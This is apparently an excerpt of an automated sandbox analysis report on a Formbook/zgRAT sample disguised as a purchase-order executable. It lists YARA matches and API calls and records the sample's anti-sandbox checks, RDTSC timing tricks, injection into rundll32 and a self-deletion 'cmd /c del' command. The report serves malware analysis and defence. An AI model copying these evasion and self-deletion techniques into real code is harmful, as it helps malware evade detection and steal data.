        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 045DB150 appears 35 times
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418AB0 NtCreateFile,4_2_00418AB0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418B60 NtReadFile,4_2_00418B60
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418BE0 NtClose,4_2_00418BE0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418C90 NtAllocateVirtualMemory,4_2_00418C90
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418A6B NtCreateFile,4_2_00418A6B
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418B5A NtReadFile,4_2_00418B5A
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418BDA NtClose,4_2_00418BDA
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00418C8A NtAllocateVirtualMemory,4_2_00418C8A
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04619860
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619840 NtDelayExecution,LdrInitializeThunk,10_2_04619840
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619540 NtReadFile,LdrInitializeThunk,10_2_04619540
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04619910
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046195D0 NtClose,LdrInitializeThunk,10_2_046195D0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046199A0 NtCreateSection,LdrInitializeThunk,10_2_046199A0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04619660
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619650 NtQueryValueKey,LdrInitializeThunk,10_2_04619650
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619A50 NtCreateFile,LdrInitializeThunk,10_2_04619A50
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046196E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_046196E0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046196D0 NtCreateKey,LdrInitializeThunk,10_2_046196D0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619710 NtQueryInformationToken,LdrInitializeThunk,10_2_04619710
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619FE0 NtCreateMutant,LdrInitializeThunk,10_2_04619FE0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619780 NtMapViewOfSection,LdrInitializeThunk,10_2_04619780
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0461B040 NtSuspendThread,10_2_0461B040
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619820 NtEnumerateKey,10_2_04619820
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046198F0 NtReadVirtualMemory,10_2_046198F0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046198A0 NtWriteVirtualMemory,10_2_046198A0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619560 NtWriteFile,10_2_04619560
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619950 NtQueueApcThread,10_2_04619950
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619520 NtWaitForSingleObject,10_2_04619520
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0461AD30 NtSetContextThread,10_2_0461AD30
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046195F0 NtQueryInformationFile,10_2_046195F0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046199D0 NtCreateProcessEx,10_2_046199D0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619670 NtQueryInformationProcess,10_2_04619670
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619A20 NtResumeThread,10_2_04619A20
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619A00 NtProtectVirtualMemory,10_2_04619A00
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619610 NtEnumerateValueKey,10_2_04619610
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619A10 NtQuerySection,10_2_04619A10
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619A80 NtOpenDirectoryObject,10_2_04619A80
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619760 NtOpenProcess,10_2_04619760
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619770 NtSetInformationFile,10_2_04619770
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0461A770 NtOpenThread,10_2_0461A770
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619730 NtQueryVirtualMemory,10_2_04619730
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_04619B00 NtSetValueKey,10_2_04619B00
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0461A710 NtOpenProcessToken,10_2_0461A710
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_046197A0 NtUnmapViewOfSection,10_2_046197A0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0461A3B0 NtGetContextThread,10_2_0461A3B0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8AB0 NtCreateFile,10_2_025C8AB0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8B60 NtReadFile,10_2_025C8B60
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8BE0 NtClose,10_2_025C8BE0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8C90 NtAllocateVirtualMemory,10_2_025C8C90
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8A6B NtCreateFile,10_2_025C8A6B
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8B5A NtReadFile,10_2_025C8B5A
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8BDA NtClose,10_2_025C8BDA
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C8C8A NtAllocateVirtualMemory,10_2_025C8C8A
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameIVectorView.dllN vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.452014572.000000000425F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIVectorView.dllN vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000000.425894922.0000000000F38000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCDSCollectionETWBCLProvi.exeH vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000000.458016496.0000000000A68000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCDSCollectionETWBCLProvi.exeH vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459688448.000000000126B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546674424.000000000196C000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.463062383.0000000001418000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546039980.000000000173F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: PO-INQUIRY-VALE-SP-2022-60.exe ReversingLabs: Detection: 17%
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe File read: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe:Zone.Identifier
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown Process created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Process created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
        Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-INQUIRY-VALE-SP-2022-60.exe.log
        Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@22/17
        Source: PO-INQUIRY-VALE-SP-2022-60.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_01
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Mutant created: \Sessions\1\BaseNamedObjects\hqkHXPzXLFsvpff
        Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: PO-INQUIRY-VALE-SP-2022-60.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: PO-INQUIRY-VALE-SP-2022-60.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp

        Data Obfuscation

        Source: PO-INQUIRY-VALE-SP-2022-60.exe, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.eb0000.0.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.0.PO-INQUIRY-VALE-SP-2022-60.exe.eb0000.0.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.9.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.1.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.7.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.5.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.0.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.3.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.1.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.2.unpack, ksu.cis.masaaki/CartDialog.cs .Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00419B88 push ss; retf 4_2_00419B8B
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_0041D4DF push ecx; ret 4_2_0041D4E0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_0041BDB5 push eax; ret 4_2_0041BE08
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_0041BE6C push eax; ret 4_2_0041BE72
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_0041BE02 push eax; ret 4_2_0041BE08
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_0041BE0B push eax; ret 4_2_0041BE72
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_0040C795 push ebp; ret 4_2_0040C7A0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0462D0D1 push ecx; ret 10_2_0462D0E4
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025C9B88 push ss; retf 10_2_025C9B8B
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025CBE6C push eax; ret 10_2_025CBE72
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025CBE0B push eax; ret 10_2_025CBE72
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025CBE02 push eax; ret 10_2_025CBE08
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025BC795 push ebp; ret 10_2_025BC7A0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025CD4DF push ecx; ret 10_2_025CD4E0
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_025CBDB5 push eax; ret 10_2_025CBE08
        Source: initial sample Static PE information: section name: .text entropy: 7.95977634644

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara match File source: 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: PO-INQUIRY-VALE-SP-2022-60.exe PID: 7000, type: MEMORYSTR
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe RDTSC instruction interceptor: First address: 0000000000408A44 second address: 0000000000408A4A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe RDTSC instruction interceptor: First address: 0000000000408DDE second address: 0000000000408DE4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000025B8A44 second address: 00000000025B8A4A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000025B8DDE second address: 00000000025B8DE4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe TID: 7004 Thread sleep time: -43731s >= -30000s
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe TID: 7028 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\explorer.exe TID: 4396 Thread sleep time: -100000s >= -30000s
        Source: C:\Windows\explorer.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00408D10 rdtsc 4_2_00408D10
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 9.7 %
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Thread delayed: delay time: 43731
